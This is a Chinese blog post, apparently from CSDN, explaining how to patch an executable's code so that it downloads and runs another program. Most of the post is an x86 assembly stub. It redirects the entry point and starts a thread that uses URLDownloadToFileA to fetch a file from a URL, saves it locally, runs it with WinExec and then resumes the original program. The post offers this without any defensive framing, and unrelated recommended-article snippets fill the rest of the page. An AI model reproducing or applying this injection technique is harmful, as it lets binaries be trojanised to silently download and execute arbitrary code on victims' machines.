通过修改程序的代码使程序能够下载并运行指定程序

最新推荐文章于 2023-03-06 16:56:00 发布
最新推荐文章于 2023-03-06 16:56:00 发布
阅读量1.3k 收藏 1
点赞数
分类专栏: 黑客与安全 其他技术 文章标签: c
相关代码如下:
  原入口:
  jmp  xxxxxxxx    代码段②开始的位置
  ①:
  pushad
  push xxxxxxxx    字符串urlmon.dll的位置
  call kernel32.LoadLibraryA
  push xxxxxxxx    字符串URLDownloadToFileA的位置
  push eax
  call kernel32.GetProcAddress
  push 0
  push 0
  push xxxxxxxx    存放位置,如:c://1.exe
  push xxxxxxxx    下载位置
  push 0
  call eax
  push 0
  push xxxxxxxx    存放位置
  call kernel32.WinExec
  popad
  retn


  ②:
  pushad
  push 0
  push 0
  push xxxxxxxx    代码①开始的位置
  call msvcrt._beginthread
  jmp xxxxxxxx     原入口的位置
 
yxyhack
关注
专栏目录
判断指定程序是否正在运行的Python实战代码
weixin_43178406的博客
06-10 1万+
本文主要介绍了判断指定程序是否正在运行的Python实战代码,希望能对学习python的同学们有所帮助。 文章目录 1. 问题描述 2. 解决方案 2.1 安装Python库 2.2 实战代码
python每天定时运行程序代码
12-31
思路:利用time函数返回的时间字符串与指定时间字符串做比较,相等的时候执行对应的操作。不知道大家的思路是什么,感觉这样比较耗CPU。。。。 此处设置为15:30:10 输出相应内容,需要执行什么,就修改什么。 ...
Youtube下载神器YT
lk13636244310的博客
11-26 1万+
yt - dlp常用命令
HEAP: Free Heap block XXXXXXXX modified at XXXXXXXX after it was freed
热门推荐
mons_xujingtao的博客
07-11 104万+
在有关于内存分配和释放的代码中,容易发生这种问题。这个问题的描述就是内存已经被释放了,后面还继续使用举个例子:float* distance = new float [dimension]; for(int k=0;k<10;k++) {     for(int i=0;i<dimension;i++)     {     distance[i]=0;     } delete[] d...
解决wget下载出现Connecting to xxxxxxxx:443... connected.错误解决方案 2021.6.16
qq_38801506的博客
06-16 1万+
问题: 解决: # 加上参数即可 --no-cookie --no-check-certificate 例如: wget --no-cookie --no-check-certificate https://curl.se/download/curl-7.77.0.tar.gz
MKD调试下载的时候提示:Contents mismatch at: xxxxxxxxH (Flash=xxH Required=xxH)
yky189的博客
08-30 2471
编译完下载的时候提示如下错误:))....详情:1、用的是极海的apm32f030c8t6单片机,flash64K,ram8k2、编译的代码35K原因分析:1、首先想到的是容量超范围了,但是反复确认过就是64K的单片机没有错,那不是这个问题2、尝试这把代码改小,改成26K,在下载,又可以了,没有报这个错误了;再把代码改成35K,还是下载不了,难道真的是容量不够,单片机厂家容量虚表?不至于吧3、用flash下载生产的hex文件,没问题。...
WinExec(用来打开指定exe文件)
huanglei0809的专栏
11-13 4515
转 http://hi.baidu.com/ouanan/item/56dc30904878e3b982d295f5 WinExec       c#声明         [DllImport("kernel32.dll")]         public static extern int WinExec(string exeName, int operType);     VB声
KUKA机器人程序运行速度倍率和手动速度倍率的修改方法演示.docx
最新发布
03-23
在KUKA机器人的操作与编程中,控制程序运行速度倍率和手动速度倍率是至关重要的步骤,这直接影响到机器人工作时的效率和安全性。本文将详细解释如何修改这两种速度倍率。 首先,理解速度倍率的概念。程序运行速度...
VC使指定的EXE程序不能运行程序.rar
06-19
标签 "禁止运行" 强调了主要操作是阻止指定的EXE程序运行,这在企业环境中尤其有用,比如防止员工运行未经授权或潜在有害的软件。 压缩包内的文件 "修改EXE图标" 提示,可能还包括了如何改变EXE程序的图标,使得被...
C#中用管理员身份运行程序代码实例
09-03
为此,我们创建一个`ProcessStartInfo`对象,指定运行程序(即当前程序的可执行文件路径),并设置`Verb`属性为"runas"。这个属性告诉操作系统以提升的权限(即管理员权限)启动进程。然后,使用`System....
deltafs-umbrella:一步即可下载,构建和安装deltafs,它的朋友及其最小依赖项
03-04
一步即可下载,构建和安装deltaf,其好友及其最小依赖项。 | 三角伞 XXXXXXXXX XX XX XX XXXXXXXXXXX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XXXXXXXXX XX XX XXXXXXX XX XXXXXXXXXXXXXXX XX XX XX XX XX X
xxxxxx
02-14
xxxxxx
php实现防止食品音频被下载实例,完整php代码包括播放文件
07-29
php实现防止食品音频被下载实例,完整php代码包括播放文件
Shellcode提取、加载与解析
莫慌的博客
03-06 2026
msf的shellcode 如何实现的
Connecting to https://XXXXXXXXXXXXXXXXXXXXXXXX:8440/ca
wangjunji34478的专栏
10-18 41万+
INFO 2017-08-05 01:14:38,849 HeartbeatHandlers.py:115 - Stop event received INFO 2017-08-05 01:14:38,849 NetUtil.py:125 - Stop event received INFO 2017-08-05 01:14:38,849 ExitHelper.py:53 - Performi
通过更改cmake的源码实现使用代理的下载命令
junwen的博客
10-08 2043
一些使用cmake构建的项目,使用file(download) file(download) 命令拉取网上资源构建,通过查询资料,可以通过设置系统环境变量指定cmake使用的crul使用代理,该crul是在项目源码上编译嵌入的,而非外部shell调用.如果设置的代理不生效,则需要更改源码实现. 0.具有vs ide环境 1.上cmake官网下载源码 2.使用cmake构建cmake,并生成vs项目 3.找到cmake-3.18.4\cmake-3.18.4\Source\cmFileCo.
.NET Framework:通过宏与插件扩展应用程序的实战指南
本文旨在探讨如何利用.NET Framework的强大功能,如晚期绑定和反射,来增强应用程序的可扩展性,让用户能够通过宏和插件来定制和扩展其功能。NET Framework的兼容性使得即使非.NET应用程序也能利用这些特性,实现...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值